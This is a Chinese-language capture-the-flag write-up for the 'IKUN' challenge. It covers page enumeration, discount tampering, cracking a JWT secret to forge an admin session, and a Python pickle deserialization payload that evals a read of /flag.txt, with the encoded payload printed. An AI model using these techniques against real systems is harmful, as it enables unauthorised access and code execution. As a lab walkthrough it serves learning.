IKUN python 反序列化
题目
过程
1.一开始提示说要买到V6,观察源码,发现/static/img/lv/lv4.png。注册之后尝试寻找V6。
观察url发现/shop?page=2。尝试写脚本匹配一下。发现在第181页。
import requests
url="http://20573976-f06b-4718-9d26-89a9471c808b.node3.buuoj.cn/shop?page="
for i in range(0,2000):
r=requests.get(url+str(i))
if('lv6.png') in r.text:
print(i)
break
- 1
- 2
- 3
- 4
- 5
- 6
- 7
2.尝试购买,发现钱不够,抓包看一下。修改折扣,显示该页面,只允许admin访问即为购买成功。
3.发现是jwt加密,放到jwt.io这个网站解密一下。
这里是我的注册名,ikun,理所应当改成admin,一开始不知道jwt的密码,就算是修改了也不对,还以为是思路错了。
破解jwt密码:github直接搜索“c-jwt-cracker-master”,里面有脚本可以直接使用。
密码为1Kun,右侧修改成如下:
4.放包,看到一键成为大会员。查看源码,发现一个zip。
下载下来发现是源码泄露,注意到 admin.py
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib
class AdminHandler(BaseHandler):
@tornado.web.authenticated
def get(self, *args, **kwargs):
if self.current_user == "admin":
return self.render('form.html', res='This is Black Technology!', member=0)
else:
return self.render('no_ass.html')
@tornado.web.authenticated
def post(self, *args, **kwargs):
try:
become = self.get_argument('become')
p = pickle.loads(urllib.unquote(become))
return self.render('form.html', res=p, member=1)
except:
return self.render('form.html', res='This is Black Technology!', member=0)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
这里是python的反序列化
payload:
# coding:utf-8
#version:python2.7
import pickle
import urllib
class Test(object):
def __reduce__(self):
return (eval, ("open('/flag.txt','r').read()" ,))
a = Test()
s = pickle.dumps(a)
print(urllib.quote(s))
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
运行后是c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.
对当前页面抓包,将结果放到become里面,放包。
得到flag
